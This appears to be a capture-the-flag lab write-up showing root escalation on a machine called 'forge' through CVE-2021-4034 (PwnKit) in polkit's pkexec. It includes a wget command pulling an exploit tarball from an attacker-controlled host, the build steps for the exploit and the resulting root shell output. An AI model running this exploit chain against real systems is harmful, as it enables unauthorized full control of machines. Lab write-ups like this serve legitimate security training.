CVE-2021-4034
peas discovered that the target system is vulnerable to cve-2021-4034
The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to
sudo
.
A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec
to load and execute arbitrary code with superuser privileges.
exploit (pwnkit)
I found an exploit online
Exploitation
user@forge:/dev/shm$ wget -q http://10.10.14.7/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
Delivery complete
user@forge:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.
Local compilation
user@forge:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
forge
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.111 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:7080 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:7080 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:70:80 txqueuelen 1000 (Ethernet)
RX packets 1908330 bytes 292383180 (292.3 MB)
RX errors 0 dropped 96 overruns 0 frame 0
TX packets 1958312 bytes 584492437 (584.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 37520 bytes 3028666 (3.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 37520 bytes 3028666 (3.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise